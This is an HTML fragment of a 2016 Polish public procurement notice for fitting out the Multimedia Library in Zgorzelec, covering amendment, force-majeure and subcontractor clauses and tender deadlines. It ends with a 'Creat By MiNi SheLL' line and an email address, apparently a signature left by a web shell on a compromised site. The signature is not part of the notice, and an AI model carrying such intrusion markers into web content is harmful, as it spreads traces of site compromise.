opóźnień w realizacji robót budowlanych lub dostaw elementów umeblowania w lokalu znajdującym się w parterze budynku  mieszkalnego wielorodzinnego położonego na działce nr 67/7, Obręb XI, AM 3 przy ul. Orzeszkowej 30 A, przebudowywanego na potrzeby Biblioteki Multimedialnej w Zgorzelcu,  mających wpływ na termin realizacji przedmiotu umowy. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami,
- Przesunięcie terminu realizacji zamówienia możliwe będzie z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej bezpośredni wpływ na terminowość wykonywania  przedmiotu umowy. Pod pojęciem siły wyższej Zamawiający rozumieć będzie zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą pracowników Wykonawcy), 
ataki terrorystyczne, działania wojenne, promieniowanie, lub skażenia. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami,
-  Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
-   Zmiana podwykonawcy możliwa będzie jedynie wtedy jeżeli zakres realizowanych przez podwykonawcę dostaw lub usług, nie ulegnie zmianie w stosunku do zakresu dostaw lub usług wskazanych w ofercie wykonawcy, a które zaplanował on do realizacji przez podwykonawcę.
Zmiana taka możliwa będzie jedynie na uzasadniony wniosek Wykonawcy, do którego winien załączyć on  projekt umowy z podwykonawcą, przy czym wymagana jest w tym wypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę umowy z innym podwykonawcą,
- Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Prawo Zamówień Publicznych, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub sam Wykonawca spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
- Strona ubiegająca się o zmianę umowy, winna zwrócić się do Wykonawcy lub Zamawiającego, z pisemnym wnioskiem o zmianę umowy podając równocześnie uzasadnienie i podstawę takiej  zmiany. Strony ustalają termin 7 dniowy, licząc od dnia w którym zaistniały przesłanki do wprowadzenia takiej zmiany, na przekazanie w/w wniosku do Wykonawcy lub Zamawiającego.
-   Każda ze Stron oraz Odbiorca mogą jednostronnie dokonać zmiany w zakresie osób odpowiedzialnych za realizację umowy, osób upoważnionych do odbioru, numerów telefonów, faksów oraz adresów wskazanych w umowie, powiadamiając o tym pisemnie odpowiednio drugą Stronę. Zmiany te nie wymagają zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://biblioteka-zgorzelec.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Biblioteka Publiczne
59-900 Zgorzelec ul. Bohaterów Getta 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2016 godzina 12:30, miejsce: Miejska Biblioteka Publiczne
59-900 Zgorzelec ul. Bohaterów Getta 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com